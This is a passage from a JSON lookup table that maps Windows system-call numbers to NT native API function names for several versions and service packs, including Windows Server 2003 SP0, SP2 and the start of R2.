"NtResetWriteWatch", "238": "NtRestoreKey", "239": "NtResumeProcess", "240": "NtSaveKey", "241": "NtSaveKeyEx", "242": "NtSaveMergedKeys", "243": "NtSecureConnectPort", "244": "NtSetBootEntryOrder", "245": "NtSetBootOptions", "246": "NtSetContextThread", "247": "NtSetDebugFilterState", "248": "NtSetDefaultHardErrorPort", "249": "NtSetDefaultLocale", "250": "NtSetDefaultUILanguage", "251": "NtSetDriverEntryOrder", "252": "NtSetEaFile", "253": "NtSetHighEventPair", "254": "NtSetHighWaitLowEventPair", "255": "NtSetInformationDebugObject", "256": "NtSetInformationJobObject", "257": "NtSetInformationKey", "258": "NtSetInformationToken", "259": "NtSetIntervalProfile", "260": "NtSetIoCompletion", "261": "NtSetLdtEntries", "262": "NtSetLowEventPair", "263": "NtSetLowWaitHighEventPair", "264": "NtSetQuotaInformationFile", "265": "NtSetSecurityObject", "266": "NtSetSystemEnvironmentValue", "267": "NtSetSystemEnvironmentValueEx", "268": "NtSetSystemInformation", "269": "NtSetSystemPowerState", "270": "NtSetSystemTime", "271": "NtSetThreadExecutionState", "272": "NtSetTimerResolution", "273": "NtSetUuidSeed", "274": "NtSetVolumeInformationFile", "275": "NtShutdownSystem", "276": "NtSignalAndWaitForSingleObject", "277": "NtStartProfile", "278": "NtStopProfile", "279": "NtSuspendProcess", "280": "NtSuspendThread", "281": "NtSystemDebugControl", "282": "NtTerminateJobObject", "283": "NtTestAlert", "284": "NtTranslateFilePath", "285": "NtUnloadDriver", "286": "NtUnloadKey", "287": "NtUnloadKey2", "288": "NtUnloadKeyEx", "289": "NtUnlockFile", "290": "NtUnlockVirtualMemory", "291": "NtVdmControl", "292": "NtWaitForDebugEvent", "293": "NtWaitForKeyedEvent", "294": "NtWaitHighEventPair", "295": "NtWaitLowEventPair"}, "SP2": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAddBootEntry", "103": "NtAddDriverEntry", "104": "NtAdjustGroupsToken", "105": "NtAlertResumeThread", "106": "NtAlertThread", "107": "NtAllocateLocallyUniqueId", "108": "NtAllocateUserPhysicalPages", "109": "NtAllocateUuids", "110": "NtAreMappedFilesTheSame", "111": "NtAssignProcessToJobObject", "112": "NtCancelDeviceWakeupRequest", "113": "NtCompactKeys", "114": "NtCompareTokens", "115": "NtCompleteConnectPort", "116": "NtCompressKey", "117": "NtConnectPort", "118": "NtCreateDebugObject", "119": "NtCreateDirectoryObject", "120": "NtCreateEventPair", "121": "NtCreateIoCompletion", "122": "NtCreateJobObject", "123": "NtCreateJobSet", "124": "NtCreateKeyedEvent", "125": "NtCreateMailslotFile", "126": "NtCreateMutant", "127": "NtCreateNamedPipeFile", "128": "NtCreatePagingFile", "129": "NtCreatePort", "130": "NtCreateProcess", "131": "NtCreateProfile", "132": "NtCreateSemaphore", "133": "NtCreateSymbolicLinkObject", "134": "NtCreateTimer", "135": "NtCreateToken", "136": "NtCreateWaitablePort", "137": "NtDebugActiveProcess", "138": "NtDebugContinue", "139": "NtDeleteAtom", "140": "NtDeleteBootEntry", "141": "NtDeleteDriverEntry", "142": "NtDeleteFile", "143": "NtDeleteKey", "144": "NtDeleteObjectAuditAlarm", "145": "NtDeleteValueKey", "146": "NtDisplayString", "147": "NtEnumerateBootEntries", "148": "NtEnumerateDriverEntries", "149": "NtEnumerateSystemEnvironmentValuesEx", "150": "NtExtendSection", "151": "NtFilterToken", "152": "NtFlushInstructionCache", "153": "NtFlushKey", "154": "NtFlushVirtualMemory", "155": "NtFlushWriteBuffer", "156": "NtFreeUserPhysicalPages", "157": "NtGetContextThread", "158": "NtGetCurrentProcessorNumber", "159": "NtGetDevicePowerState", "160": "NtGetPlugPlayEvent", "161": "NtGetWriteWatch", "162": "NtImpersonateAnonymousToken", "163": "NtImpersonateThread", "164": "NtInitializeRegistry", "165": "NtInitiatePowerAction", "166": "NtIsSystemResumeAutomatic", "167": "NtListenPort", "168": "NtLoadDriver", "169": "NtLoadKey", "170": "NtLoadKey2", "171": "NtLoadKeyEx", "172": "NtLockFile", "173": "NtLockProductActivationKeys", "174": "NtLockRegistryKey", "175": "NtLockVirtualMemory", "176": "NtMakePermanentObject", "177": "NtMakeTemporaryObject", "178": "NtMapUserPhysicalPages", "179": "NtModifyBootEntry", "180": "NtModifyDriverEntry", "181": "NtNotifyChangeDirectoryFile", "182": "NtNotifyChangeKey", "183": "NtNotifyChangeMultipleKeys", "184": "NtOpenEventPair", "185": "NtOpenIoCompletion", "186": "NtOpenJobObject", "187": "NtOpenKeyedEvent", "188": "NtOpenMutant", "189": "NtOpenObjectAuditAlarm", "190": "NtOpenProcessToken", "191": "NtOpenSemaphore", "192": "NtOpenSymbolicLinkObject", "193": "NtOpenThread", "194": "NtOpenTimer", "195": "NtPlugPlayControl", "196": "NtPrivilegeCheck", "197": "NtPrivilegeObjectAuditAlarm", "198": "NtPrivilegedServiceAuditAlarm", "199": "NtPulseEvent", "200": "NtQueryBootEntryOrder", "201": "NtQueryBootOptions", "202": "NtQueryDebugFilterState", "203": "NtQueryDirectoryObject", "204": "NtQueryDriverEntryOrder", "205": "NtQueryEaFile", "206": "NtQueryFullAttributesFile", "207": "NtQueryInformationAtom", "208": "NtQueryInformationJobObject", "209": "NtQueryInformationPort", "210": "NtQueryInstallUILanguage", "211": "NtQueryIntervalProfile", "212": "NtQueryIoCompletion", "213": "NtQueryMultipleValueKey", "214": "NtQueryMutant", "215": "NtQueryOpenSubKeys", "216": "NtQueryOpenSubKeysEx", "217": "NtQueryPortInformationProcess", "218": "NtQueryQuotaInformationFile", "219": "NtQuerySecurityObject", "220": "NtQuerySemaphore", "221": "NtQuerySymbolicLinkObject", "222": "NtQuerySystemEnvironmentValue", "223": "NtQuerySystemEnvironmentValueEx", "224": "NtQueryTimerResolution", "225": "NtRaiseException", "226": "NtRaiseHardError", "227": "NtRegisterThreadTerminatePort", "228": "NtReleaseKeyedEvent", "229": "NtRemoveProcessDebug", "230": "NtRenameKey", "231": "NtReplaceKey", "232": "NtReplyWaitReplyPort", "233": "NtRequestDeviceWakeup", "234": "NtRequestPort", "235": "NtRequestWakeupLatency", "236": "NtResetEvent", "237": "NtResetWriteWatch", "238": "NtRestoreKey", "239": "NtResumeProcess", "240": "NtSaveKey", "241": "NtSaveKeyEx", "242": "NtSaveMergedKeys", "243": "NtSecureConnectPort", "244": "NtSetBootEntryOrder", "245": "NtSetBootOptions", "246": "NtSetContextThread", "247": "NtSetDebugFilterState", "248": "NtSetDefaultHardErrorPort", "249": "NtSetDefaultLocale", "250": "NtSetDefaultUILanguage", "251": "NtSetDriverEntryOrder", "252": "NtSetEaFile", "253": "NtSetHighEventPair", "254": "NtSetHighWaitLowEventPair", "255": "NtSetInformationDebugObject", "256": "NtSetInformationJobObject", "257": "NtSetInformationKey", "258": "NtSetInformationToken", "259": "NtSetIntervalProfile", "260": "NtSetIoCompletion", "261": "NtSetLdtEntries", "262": "NtSetLowEventPair", "263": "NtSetLowWaitHighEventPair", "264": "NtSetQuotaInformationFile", "265": "NtSetSecurityObject", "266": "NtSetSystemEnvironmentValue", "267": "NtSetSystemEnvironmentValueEx", "268": "NtSetSystemInformation", "269": "NtSetSystemPowerState", "270": "NtSetSystemTime", "271": "NtSetThreadExecutionState", "272": "NtSetTimerResolution", "273": "NtSetUuidSeed", "274": "NtSetVolumeInformationFile", "275": "NtShutdownSystem", "276": "NtSignalAndWaitForSingleObject", "277": "NtStartProfile", "278": "NtStopProfile", "279": "NtSuspendProcess", "280": "NtSuspendThread", "281": "NtSystemDebugControl", "282": "NtTerminateJobObject", "283": "NtTestAlert", "284": "NtTranslateFilePath", "285": "NtUnloadDriver", "286": "NtUnloadKey", "287": "NtUnloadKey2", "288": "NtUnloadKeyEx", "289": "NtUnlockFile", "290": "NtUnlockVirtualMemory", "291": "NtVdmControl", "292": "NtWaitForDebugEvent", "293": "NtWaitForKeyedEvent", "294": "NtWaitHighEventPair", "295": "NtWaitLowEventPair"}}, "Windows Server 2003": {"SP0": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAddBootEntry", "103": "NtAddDriverEntry", "104": "NtAdjustGroupsToken", "105": "NtAlertResumeThread", "106": "NtAlertThread", "107": "NtAllocateLocallyUniqueId", "108": "NtAllocateUserPhysicalPages", "109": "NtAllocateUuids", "110": "NtAreMappedFilesTheSame", "111": "NtAssignProcessToJobObject", "112": "NtCancelDeviceWakeupRequest", "113": "NtCompactKeys", "114": "NtCompareTokens", "115": "NtCompleteConnectPort", "116": "NtCompressKey", "117": "NtConnectPort", "118": "NtCreateDebugObject", "119": "NtCreateDirectoryObject", "120": "NtCreateEventPair", "121": "NtCreateIoCompletion", "122": "NtCreateJobObject", "123": "NtCreateJobSet", "124": "NtCreateKeyedEvent", "125": "NtCreateMailslotFile", "126": "NtCreateMutant", "127": "NtCreateNamedPipeFile", "128": "NtCreatePagingFile", "129": "NtCreatePort", "130": "NtCreateProcess", "131": "NtCreateProfile", "132": "NtCreateSemaphore", "133": "NtCreateSymbolicLinkObject", "134": "NtCreateTimer", "135": "NtCreateToken", "136": "NtCreateWaitablePort", "137": "NtDebugActiveProcess", "138": "NtDebugContinue", "139": "NtDeleteAtom", "140": "NtDeleteBootEntry", "141": "NtDeleteDriverEntry", "142": "NtDeleteFile", "143": "NtDeleteKey", "144": "NtDeleteObjectAuditAlarm", "145": "NtDeleteValueKey", "146": "NtDisplayString", "147": "NtEnumerateBootEntries", "148": "NtEnumerateDriverEntries", "149": "NtEnumerateSystemEnvironmentValuesEx", "150": "NtExtendSection", "151": "NtFilterToken", "152": "NtFlushInstructionCache", "153": "NtFlushKey", "154": "NtFlushVirtualMemory", "155": "NtFlushWriteBuffer", "156": "NtFreeUserPhysicalPages", "157": "NtGetContextThread", "158": "NtGetCurrentProcessorNumber", "159": "NtGetDevicePowerState", "160": "NtGetPlugPlayEvent", "161": "NtGetWriteWatch", "162": "NtImpersonateAnonymousToken", "163": "NtImpersonateThread", "164": "NtInitializeRegistry", "165": "NtInitiatePowerAction", "166": "NtIsSystemResumeAutomatic", "167": "NtListenPort", "168": "NtLoadDriver", "169": "NtLoadKey", "170": "NtLoadKey2", "171": "NtLoadKeyEx", "172": "NtLockFile", "173": "NtLockProductActivationKeys", "174": "NtLockRegistryKey", "175": "NtLockVirtualMemory", "176": "NtMakePermanentObject", "177": "NtMakeTemporaryObject", "178": "NtMapUserPhysicalPages", "179": "NtModifyBootEntry", "180": "NtModifyDriverEntry", "181": "NtNotifyChangeDirectoryFile", "182": "NtNotifyChangeKey", "183": "NtNotifyChangeMultipleKeys", "184": "NtOpenEventPair", "185": "NtOpenIoCompletion", "186": "NtOpenJobObject", "187": "NtOpenKeyedEvent", "188": "NtOpenMutant", "189": "NtOpenObjectAuditAlarm", "190": "NtOpenProcessToken", "191": "NtOpenSemaphore", "192": "NtOpenSymbolicLinkObject", "193": "NtOpenThread", "194": "NtOpenTimer", "195": "NtPlugPlayControl", "196": "NtPrivilegeCheck", "197": "NtPrivilegeObjectAuditAlarm", "198": "NtPrivilegedServiceAuditAlarm", "199": "NtPulseEvent", "200": "NtQueryBootEntryOrder", "201": "NtQueryBootOptions", "202": "NtQueryDebugFilterState", "203": "NtQueryDirectoryObject", "204": "NtQueryDriverEntryOrder", "205": "NtQueryEaFile", "206": "NtQueryFullAttributesFile", "207": "NtQueryInformationAtom", "208": "NtQueryInformationJobObject", "209": "NtQueryInformationPort", "210": "NtQueryInstallUILanguage", "211": "NtQueryIntervalProfile", "212": "NtQueryIoCompletion", "213": "NtQueryMultipleValueKey", "214": "NtQueryMutant", "215": "NtQueryOpenSubKeys", "216": "NtQueryOpenSubKeysEx", "217": "NtQueryPortInformationProcess", "218": "NtQueryQuotaInformationFile", "219": "NtQuerySecurityObject", "220": "NtQuerySemaphore", "221": "NtQuerySymbolicLinkObject", "222": "NtQuerySystemEnvironmentValue", "223": "NtQuerySystemEnvironmentValueEx", "224": "NtQueryTimerResolution", "225": "NtRaiseException", "226": "NtRaiseHardError", "227": "NtRegisterThreadTerminatePort", "228": "NtReleaseKeyedEvent", "229": "NtRemoveProcessDebug", "230": "NtRenameKey", "231": "NtReplaceKey", "232": "NtReplyWaitReplyPort", "233": "NtRequestDeviceWakeup", "234": "NtRequestPort", "235": "NtRequestWakeupLatency", "236": "NtResetEvent", "237": "NtResetWriteWatch", "238": "NtRestoreKey", "239": "NtResumeProcess", "240": "NtSaveKey", "241": "NtSaveKeyEx", "242": "NtSaveMergedKeys", "243": "NtSecureConnectPort", "244": "NtSetBootEntryOrder", "245": "NtSetBootOptions", "246": "NtSetContextThread", "247": "NtSetDebugFilterState", "248": "NtSetDefaultHardErrorPort", "249": "NtSetDefaultLocale", "250": "NtSetDefaultUILanguage", "251": "NtSetDriverEntryOrder", "252": "NtSetEaFile", "253": "NtSetHighEventPair", "254": "NtSetHighWaitLowEventPair", "255": "NtSetInformationDebugObject", "256": "NtSetInformationJobObject", "257": "NtSetInformationKey", "258": "NtSetInformationToken", "259": "NtSetIntervalProfile", "260": "NtSetIoCompletion", "261": "NtSetLdtEntries", "262": "NtSetLowEventPair", "263": "NtSetLowWaitHighEventPair", "264": "NtSetQuotaInformationFile", "265": "NtSetSecurityObject", "266": "NtSetSystemEnvironmentValue", "267": "NtSetSystemEnvironmentValueEx", "268": "NtSetSystemInformation", "269": "NtSetSystemPowerState", "270": "NtSetSystemTime", "271": "NtSetThreadExecutionState", "272": "NtSetTimerResolution", "273": "NtSetUuidSeed", "274": "NtSetVolumeInformationFile", "275": "NtShutdownSystem", "276": "NtSignalAndWaitForSingleObject", "277": "NtStartProfile", "278": "NtStopProfile", "279": "NtSuspendProcess", "280": "NtSuspendThread", "281": "NtSystemDebugControl", "282": "NtTerminateJobObject", "283": "NtTestAlert", "284": "NtTranslateFilePath", "285": "NtUnloadDriver", "286": "NtUnloadKey", "287": "NtUnloadKey2", "288": "NtUnloadKeyEx", "289": "NtUnlockFile", "290": "NtUnlockVirtualMemory", "291": "NtVdmControl", "292": "NtWaitForDebugEvent", "293": "NtWaitForKeyedEvent", "294": "NtWaitHighEventPair", "295": "NtWaitLowEventPair"}, "SP2": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": "NtReplyPort", "10": "NtSetInformationThread", "11": "NtSetEvent", "12": "NtClose", "13": "NtQueryObject", "14": "NtQueryInformationFile", "15": "NtOpenKey", "16": "NtEnumerateValueKey", "17": "NtFindAtom", "18": "NtQueryDefaultLocale", "19": "NtQueryKey", "20": "NtQueryValueKey", "21": "NtAllocateVirtualMemory", "22": "NtQueryInformationProcess", "23": "NtWaitForMultipleObjects32", "24": "NtWriteFileGather", "25": "NtSetInformationProcess", "26": "NtCreateKey", "27": "NtFreeVirtualMemory", "28": "NtImpersonateClientOfPort", "29": "NtReleaseMutant", "30": "NtQueryInformationToken", "31": "NtRequestWaitReplyPort", "32": "NtQueryVirtualMemory", "33": "NtOpenThreadToken", "34": "NtQueryInformationThread", "35": "NtOpenProcess", "36": "NtSetInformationFile", "37": "NtMapViewOfSection", "38": "NtAccessCheckAndAuditAlarm", "39": "NtUnmapViewOfSection", "40": "NtReplyWaitReceivePortEx", "41": "NtTerminateProcess", "42": "NtSetEventBoostPriority", "43": "NtReadFileScatter", "44": "NtOpenThreadTokenEx", "45": "NtOpenProcessTokenEx", "46": "NtQueryPerformanceCounter", "47": "NtEnumerateKey", "48": "NtOpenFile", "49": "NtDelayExecution", "50": "NtQueryDirectoryFile", "51": "NtQuerySystemInformation", "52": "NtOpenSection", "53": "NtQueryTimer", "54": "NtFsControlFile", "55": "NtWriteVirtualMemory", "56": "NtCloseObjectAuditAlarm", "57": "NtDuplicateObject", "58": "NtQueryAttributesFile", "59": "NtClearEvent", "60": "NtReadVirtualMemory", "61": "NtOpenEvent", "62": "NtAdjustPrivilegesToken", "63": "NtDuplicateToken", "64": "NtContinue", "65": "NtQueryDefaultUILanguage", "66": "NtQueueApcThread", "67": "NtYieldExecution", "68": "NtAddAtom", "69": "NtCreateEvent", "70": "NtQueryVolumeInformationFile", "71": "NtCreateSection", "72": "NtFlushBuffersFile", "73": "NtApphelpCacheControl", "74": "NtCreateProcessEx", "75": "NtCreateThread", "76": "NtIsProcessInJob", "77": "NtProtectVirtualMemory", "78": "NtQuerySection", "79": "NtResumeThread", "80": "NtTerminateThread", "81": "NtReadRequestData", "82": "NtCreateFile", "83": "NtQueryEvent", "84": "NtWriteRequestData", "85": "NtOpenDirectoryObject", "86": "NtAccessCheckByTypeAndAuditAlarm", "87": "NtQuerySystemTime", "88": "NtWaitForMultipleObjects", "89": "NtSetInformationObject", "90": "NtCancelIoFile", "91": "NtTraceEvent", "92": "NtPowerInformation", "93": "NtSetValueKey", "94": "NtCancelTimer", "95": "NtSetTimer", "96": "NtAcceptConnectPort", "97": "NtAccessCheck", "98": "NtAccessCheckByType", "99": "NtAccessCheckByTypeResultList", "100": "NtAccessCheckByTypeResultListAndAuditAlarm", "101": "NtAccessCheckByTypeResultListAndAuditAlarmByHandle", "102": "NtAddBootEntry", "103": "NtAddDriverEntry", "104": "NtAdjustGroupsToken", "105": "NtAlertResumeThread", "106": "NtAlertThread", "107": "NtAllocateLocallyUniqueId", "108": "NtAllocateUserPhysicalPages", "109": "NtAllocateUuids", "110": "NtAreMappedFilesTheSame", "111": "NtAssignProcessToJobObject", "112": "NtCancelDeviceWakeupRequest", "113": "NtCompactKeys", "114": "NtCompareTokens", "115": "NtCompleteConnectPort", "116": "NtCompressKey", "117": "NtConnectPort", "118": "NtCreateDebugObject", "119": "NtCreateDirectoryObject", "120": "NtCreateEventPair", "121": "NtCreateIoCompletion", "122": "NtCreateJobObject", "123": "NtCreateJobSet", "124": "NtCreateKeyedEvent", "125": "NtCreateMailslotFile", "126": "NtCreateMutant", "127": "NtCreateNamedPipeFile", "128": "NtCreatePagingFile", "129": "NtCreatePort", "130": "NtCreateProcess", "131": "NtCreateProfile", "132": "NtCreateSemaphore", "133": "NtCreateSymbolicLinkObject", "134": "NtCreateTimer", "135": "NtCreateToken", "136": "NtCreateWaitablePort", "137": "NtDebugActiveProcess", "138": "NtDebugContinue", "139": "NtDeleteAtom", "140": "NtDeleteBootEntry", "141": "NtDeleteDriverEntry", "142": "NtDeleteFile", "143": "NtDeleteKey", "144": "NtDeleteObjectAuditAlarm", "145": "NtDeleteValueKey", "146": "NtDisplayString", "147": "NtEnumerateBootEntries", "148": "NtEnumerateDriverEntries", "149": "NtEnumerateSystemEnvironmentValuesEx", "150": "NtExtendSection", "151": "NtFilterToken", "152": "NtFlushInstructionCache", "153": "NtFlushKey", "154": "NtFlushVirtualMemory", "155": "NtFlushWriteBuffer", "156": "NtFreeUserPhysicalPages", "157": "NtGetContextThread", "158": "NtGetCurrentProcessorNumber", "159": "NtGetDevicePowerState", "160": "NtGetPlugPlayEvent", "161": "NtGetWriteWatch", "162": "NtImpersonateAnonymousToken", "163": "NtImpersonateThread", "164": "NtInitializeRegistry", "165": "NtInitiatePowerAction", "166": "NtIsSystemResumeAutomatic", "167": "NtListenPort", "168": "NtLoadDriver", "169": "NtLoadKey", "170": "NtLoadKey2", "171": "NtLoadKeyEx", "172": "NtLockFile", "173": "NtLockProductActivationKeys", "174": "NtLockRegistryKey", "175": "NtLockVirtualMemory", "176": "NtMakePermanentObject", "177": "NtMakeTemporaryObject", "178": "NtMapUserPhysicalPages", "179": "NtModifyBootEntry", "180": "NtModifyDriverEntry", "181": "NtNotifyChangeDirectoryFile", "182": "NtNotifyChangeKey", "183": "NtNotifyChangeMultipleKeys", "184": "NtOpenEventPair", "185": "NtOpenIoCompletion", "186": "NtOpenJobObject", "187": "NtOpenKeyedEvent", "188": "NtOpenMutant", "189": "NtOpenObjectAuditAlarm", "190": "NtOpenProcessToken", "191": "NtOpenSemaphore", "192": "NtOpenSymbolicLinkObject", "193": "NtOpenThread", "194": "NtOpenTimer", "195": "NtPlugPlayControl", "196": "NtPrivilegeCheck", "197": "NtPrivilegeObjectAuditAlarm", "198": "NtPrivilegedServiceAuditAlarm", "199": "NtPulseEvent", "200": "NtQueryBootEntryOrder", "201": "NtQueryBootOptions", "202": "NtQueryDebugFilterState", "203": "NtQueryDirectoryObject", "204": "NtQueryDriverEntryOrder", "205": "NtQueryEaFile", "206": "NtQueryFullAttributesFile", "207": "NtQueryInformationAtom", "208": "NtQueryInformationJobObject", "209": "NtQueryInformationPort", "210": "NtQueryInstallUILanguage", "211": "NtQueryIntervalProfile", "212": "NtQueryIoCompletion", "213": "NtQueryMultipleValueKey", "214": "NtQueryMutant", "215": "NtQueryOpenSubKeys", "216": "NtQueryOpenSubKeysEx", "217": "NtQueryPortInformationProcess", "218": "NtQueryQuotaInformationFile", "219": "NtQuerySecurityObject", "220": "NtQuerySemaphore", "221": "NtQuerySymbolicLinkObject", "222": "NtQuerySystemEnvironmentValue", "223": "NtQuerySystemEnvironmentValueEx", "224": "NtQueryTimerResolution", "225": "NtRaiseException", "226": "NtRaiseHardError", "227": "NtRegisterThreadTerminatePort", "228": "NtReleaseKeyedEvent", "229": "NtRemoveProcessDebug", "230": "NtRenameKey", "231": "NtReplaceKey", "232": "NtReplyWaitReplyPort", "233": "NtRequestDeviceWakeup", "234": "NtRequestPort", "235": "NtRequestWakeupLatency", "236": "NtResetEvent", "237": "NtResetWriteWatch", "238": "NtRestoreKey", "239": "NtResumeProcess", "240": "NtSaveKey", "241": "NtSaveKeyEx", "242": "NtSaveMergedKeys", "243": "NtSecureConnectPort", "244": "NtSetBootEntryOrder", "245": "NtSetBootOptions", "246": "NtSetContextThread", "247": "NtSetDebugFilterState", "248": "NtSetDefaultHardErrorPort", "249": "NtSetDefaultLocale", "250": "NtSetDefaultUILanguage", "251": "NtSetDriverEntryOrder", "252": "NtSetEaFile", "253": "NtSetHighEventPair", "254": "NtSetHighWaitLowEventPair", "255": "NtSetInformationDebugObject", "256": "NtSetInformationJobObject", "257": "NtSetInformationKey", "258": "NtSetInformationToken", "259": "NtSetIntervalProfile", "260": "NtSetIoCompletion", "261": "NtSetLdtEntries", "262": "NtSetLowEventPair", "263": "NtSetLowWaitHighEventPair", "264": "NtSetQuotaInformationFile", "265": "NtSetSecurityObject", "266": "NtSetSystemEnvironmentValue", "267": "NtSetSystemEnvironmentValueEx", "268": "NtSetSystemInformation", "269": "NtSetSystemPowerState", "270": "NtSetSystemTime", "271": "NtSetThreadExecutionState", "272": "NtSetTimerResolution", "273": "NtSetUuidSeed", "274": "NtSetVolumeInformationFile", "275": "NtShutdownSystem", "276": "NtSignalAndWaitForSingleObject", "277": "NtStartProfile", "278": "NtStopProfile", "279": "NtSuspendProcess", "280": "NtSuspendThread", "281": "NtSystemDebugControl", "282": "NtTerminateJobObject", "283": "NtTestAlert", "284": "NtTranslateFilePath", "285": "NtUnloadDriver", "286": "NtUnloadKey", "287": "NtUnloadKey2", "288": "NtUnloadKeyEx", "289": "NtUnlockFile", "290": "NtUnlockVirtualMemory", "291": "NtVdmControl", "292": "NtWaitForDebugEvent", "293": "NtWaitForKeyedEvent", "294": "NtWaitHighEventPair", "295": "NtWaitLowEventPair"}, "R2": {"0": "NtMapUserPhysicalPagesScatter", "1": "NtWaitForSingleObject", "2": "NtCallbackReturn", "3": "NtReadFile", "4": "NtDeviceIoControlFile", "5": "NtWriteFile", "6": "NtRemoveIoCompletion", "7": "NtReleaseSemaphore", "8": "NtReplyWaitReceivePort", "9": 